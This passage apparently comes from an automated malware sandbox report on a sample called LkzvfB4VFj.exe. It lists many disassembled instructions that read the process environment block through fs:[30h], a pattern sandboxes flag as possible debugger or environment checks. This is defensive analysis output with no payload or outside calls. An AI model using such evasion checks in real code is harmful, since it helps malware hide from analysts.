      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360454B0 mov eax, dword ptr fs:[00000030h]3_2_360454B0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360454B0 mov ecx, dword ptr fs:[00000030h]3_2_360454B0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC174A mov eax, dword ptr fs:[00000030h]3_2_35FC174A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC3740 mov eax, dword ptr fs:[00000030h]3_2_35FC3740
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB9723 mov eax, dword ptr fs:[00000030h]3_2_35FB9723
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F4FD mov eax, dword ptr fs:[00000030h]3_2_3604F4FD
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D700 mov ecx, dword ptr fs:[00000030h]3_2_35F9D700
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B705 mov eax, dword ptr fs:[00000030h]3_2_35F8B705
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604550D mov eax, dword ptr fs:[00000030h]3_2_3604550D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604550D mov eax, dword ptr fs:[00000030h]3_2_3604550D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604550D mov eax, dword ptr fs:[00000030h]3_2_3604550D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F896E0 mov eax, dword ptr fs:[00000030h]3_2_35F896E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F896E0 mov eax, dword ptr fs:[00000030h]3_2_35F896E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov ecx, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov ecx, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F51B mov eax, dword ptr fs:[00000030h]3_2_3603F51B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F956E0 mov eax, dword ptr fs:[00000030h]3_2_35F956E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F956E0 mov eax, dword ptr fs:[00000030h]3_2_35F956E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F956E0 mov eax, dword ptr fs:[00000030h]3_2_35F956E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBD6D0 mov eax, dword ptr fs:[00000030h]3_2_35FBD6D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B55F mov eax, dword ptr fs:[00000030h]3_2_3606B55F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B55F mov eax, dword ptr fs:[00000030h]3_2_3606B55F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36019567 mov eax, dword ptr fs:[00000030h]3_2_36019567
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F582 mov eax, dword ptr fs:[00000030h]3_2_3604F582
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36037591 mov edi, dword ptr fs:[00000030h]3_2_36037591
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3660 mov eax, dword ptr fs:[00000030h]3_2_35FA3660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3660 mov eax, dword ptr fs:[00000030h]3_2_35FA3660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3660 mov eax, dword ptr fs:[00000030h]3_2_35FA3660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87662 mov eax, dword ptr fs:[00000030h]3_2_35F87662
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87662 mov eax, dword ptr fs:[00000030h]3_2_35F87662
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F87662 mov eax, dword ptr fs:[00000030h]3_2_35F87662
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9965A mov eax, dword ptr fs:[00000030h]3_2_35F9965A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9965A mov eax, dword ptr fs:[00000030h]3_2_35F9965A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC5654 mov eax, dword ptr fs:[00000030h]3_2_35FC5654
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D64A mov eax, dword ptr fs:[00000030h]3_2_35F8D64A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D64A mov eax, dword ptr fs:[00000030h]3_2_35F8D64A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93640 mov eax, dword ptr fs:[00000030h]3_2_35F93640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF640 mov eax, dword ptr fs:[00000030h]3_2_35FAF640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF640 mov eax, dword ptr fs:[00000030h]3_2_35FAF640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF640 mov eax, dword ptr fs:[00000030h]3_2_35FAF640
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCF63F mov eax, dword ptr fs:[00000030h]3_2_35FCF63F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCF63F mov eax, dword ptr fs:[00000030h]3_2_35FCF63F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601B5D3 mov eax, dword ptr fs:[00000030h]3_2_3601B5D3
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97623 mov eax, dword ptr fs:[00000030h]3_2_35F97623
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F95622 mov eax, dword ptr fs:[00000030h]3_2_35F95622
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F95622 mov eax, dword ptr fs:[00000030h]3_2_35F95622
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360155E0 mov eax, dword ptr fs:[00000030h]3_2_360155E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC360F mov eax, dword ptr fs:[00000030h]3_2_35FC360F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBD600 mov eax, dword ptr fs:[00000030h]3_2_35FBD600
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBD600 mov eax, dword ptr fs:[00000030h]3_2_35FBD600
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F891F0 mov eax, dword ptr fs:[00000030h]3_2_35F891F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F891F0 mov eax, dword ptr fs:[00000030h]3_2_35F891F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF1F0 mov eax, dword ptr fs:[00000030h]3_2_35FBF1F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF1F0 mov eax, dword ptr fs:[00000030h]3_2_35FBF1F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601B214 mov eax, dword ptr fs:[00000030h]3_2_3601B214
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601B214 mov eax, dword ptr fs:[00000030h]3_2_3601B214
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E0 mov eax, dword ptr fs:[00000030h]3_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F991E5 mov eax, dword ptr fs:[00000030h]3_2_35F991E5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F991E5 mov eax, dword ptr fs:[00000030h]3_2_35F991E5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C0 mov eax, dword ptr fs:[00000030h]3_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC31BE mov eax, dword ptr fs:[00000030h]3_2_35FC31BE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC31BE mov eax, dword ptr fs:[00000030h]3_2_35FC31BE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F247 mov eax, dword ptr fs:[00000030h]3_2_3604F247
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C mov eax, dword ptr fs:[00000030h]3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600D250 mov eax, dword ptr fs:[00000030h]3_2_3600D250
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600D250 mov ecx, dword ptr fs:[00000030h]3_2_3600D250
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1190 mov eax, dword ptr fs:[00000030h]3_2_35FD1190
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1190 mov eax, dword ptr fs:[00000030h]3_2_35FD1190
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB9194 mov eax, dword ptr fs:[00000030h]3_2_35FB9194
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604D270 mov eax, dword ptr fs:[00000030h]3_2_3604D270
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602327E mov eax, dword ptr fs:[00000030h]3_2_3602327E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FE717A mov eax, dword ptr fs:[00000030h]3_2_35FE717A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FE717A mov eax, dword ptr fs:[00000030h]3_2_35FE717A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC716D mov eax, dword ptr fs:[00000030h]3_2_35FC716D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F2AE mov eax, dword ptr fs:[00000030h]3_2_3604F2AE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360592AB mov eax, dword ptr fs:[00000030h]3_2_360592AB
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B2BC mov eax, dword ptr fs:[00000030h]3_2_3606B2BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360632C9 mov eax, dword ptr fs:[00000030h]3_2_360632C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7128 mov eax, dword ptr fs:[00000030h]3_2_35FC7128
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7128 mov eax, dword ptr fs:[00000030h]3_2_35FC7128
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F113 mov eax, dword ptr fs:[00000030h]3_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB510F mov eax, dword ptr fs:[00000030h]3_2_35FB510F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9510D mov eax, dword ptr fs:[00000030h]3_2_35F9510D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F890F8 mov eax, dword ptr fs:[00000030h]3_2_35F890F8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD0F0 mov eax, dword ptr fs:[00000030h]3_2_35FCD0F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD0F0 mov ecx, dword ptr fs:[00000030h]3_2_35FCD0F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601330C mov eax, dword ptr fs:[00000030h]3_2_3601330C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F30A mov eax, dword ptr fs:[00000030h]3_2_3604F30A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAB0D0 mov eax, dword ptr fs:[00000030h]3_2_35FAB0D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B0D6 mov eax, dword ptr fs:[00000030h]3_2_35F8B0D6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36063336 mov eax, dword ptr fs:[00000030h]3_2_36063336
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F97072 mov eax, dword ptr fs:[00000030h]3_2_35F97072
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F38A mov eax, dword ptr fs:[00000030h]3_2_3604F38A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91051 mov eax, dword ptr fs:[00000030h]3_2_35F91051
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91051 mov eax, dword ptr fs:[00000030h]3_2_35F91051
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D02D mov eax, dword ptr fs:[00000030h]3_2_35F8D02D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB5004 mov eax, dword ptr fs:[00000030h]3_2_35FB5004
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB5004 mov ecx, dword ptr fs:[00000030h]3_2_35FB5004
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC33D0 mov eax, dword ptr fs:[00000030h]3_2_35FC33D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606505B mov eax, dword ptr fs:[00000030h]3_2_3606505B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039060 mov eax, dword ptr fs:[00000030h]3_2_36039060
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F91380 mov eax, dword ptr fs:[00000030h]3_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAF380 mov eax, dword ptr fs:[00000030h]3_2_35FAF380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36017090 mov eax, dword ptr fs:[00000030h]3_2_36017090
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B360 mov eax, dword ptr fs:[00000030h]3_2_35F9B360
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603F0A5 mov eax, dword ptr fs:[00000030h]3_2_3603F0A5
